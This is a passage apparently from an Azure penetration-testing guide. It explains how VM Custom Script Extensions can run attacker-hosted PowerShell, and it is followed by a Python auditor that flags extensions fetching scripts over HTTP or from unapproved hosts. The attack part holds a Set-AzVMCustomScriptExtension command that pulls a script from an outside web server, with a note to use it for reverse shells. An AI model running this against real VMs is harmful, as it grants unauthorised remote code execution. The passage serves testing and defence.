
Executing VM extensions

Azure VM extensions are tools used by administrators to configure VMs after they have been deployed. As a way of customizing these extensions for different uses, Microsoft allows for custom script extensions to be created, based on a schema that they have defined.

This schema includes file URIs (URLs that point to script files), which let us specify the PowerShell file that we want to execute. As attackers, we will need a web server to host the files that these URIs point to.

The command for running the custom script extension consists of the following parameters:

  • ResourceGroupName: The resource group for the VM.

  • VMName: The name of the VM.

  • Location: The region the VM is in.

  • FileUri: The HTTP/HTTPS URL for the script file.

  • Run: The file to run; this should be the same as the ps1 filename.

  • Name: The name that the custom script extension will have.

Command example:

Set-AzVMCustomScriptExtension -ResourceGroupName TEST -VMName PentestVM -Location westcentralus -FileUri 'http://book.azurepentesting.com/whoami.ps1' -Run 'whoami.ps1' -Name CustomScriptExtension

(Use this to run your reverse shells)
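From the defender's side, the FileUri is the part of this technique that stays visible in the extension's public settings. The following is an added example, not code from the original page: it audits VM extension resources in ARM JSON form and flags Custom Script Extensions whose scripts are fetched over plain HTTP or from a host outside an allow-list. The approved host and all sample records except the first are constructed assumptions.

```python
from urllib.parse import urlparse

# Assumption: the only host this organisation stages scripts on (constructed).
APPROVED_HOSTS = {"corpscripts.blob.core.windows.net"}

def audit_extension(ext):
    """Return a list of findings for one ARM VM-extension resource."""
    props = ext.get("properties", {})
    if (props.get("publisher"), props.get("type")) != (
            "Microsoft.Compute", "CustomScriptExtension"):
        return []  # not a Windows Custom Script Extension
    uris = (props.get("settings") or {}).get("fileUris") or []
    if not uris:
        # fileUris may instead be supplied in protected settings, which ARM
        # never returns, so the download source cannot be checked here.
        return ["no fileUris in public settings; source not auditable"]
    findings = []
    for uri in uris:
        parsed = urlparse(uri)
        if parsed.scheme.lower() != "https":
            findings.append(f"{uri}: fetched without TLS")
        if (parsed.hostname or "").lower() not in APPROVED_HOSTS:
            findings.append(f"{uri}: host not on approved list")
    return findings

def audit_all(extensions):
    """Map extension name -> findings, keeping only extensions with findings."""
    report = {}
    for ext in extensions:
        findings = audit_extension(ext)
        if findings:
            report[ext.get("name", "<unnamed>")] = findings
    return report

def _cse(name, settings):
    return {"name": name, "properties": {"publisher": "Microsoft.Compute",
            "type": "CustomScriptExtension", "settings": settings}}

# Constructed sample input; the first entry mirrors the command on this page.
SAMPLE = [
    _cse("CustomScriptExtension",
         {"fileUris": ["http://book.azurepentesting.com/whoami.ps1"]}),
    _cse("DeployBaseline",
         {"fileUris": ["https://corpscripts.blob.core.windows.net/d/setup.ps1"]}),
    _cse("OpaqueScript", {}),
    {"name": "AzureMonitorWindowsAgent", "properties": {
        "publisher": "Microsoft.Azure.Monitor", "type": "AzureMonitorWindowsAgent"}},
]

if __name__ == "__main__":
    for ext_name, items in audit_all(SAMPLE).items():
        for item in items:
            print(f"[{ext_name}] {item}")
```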
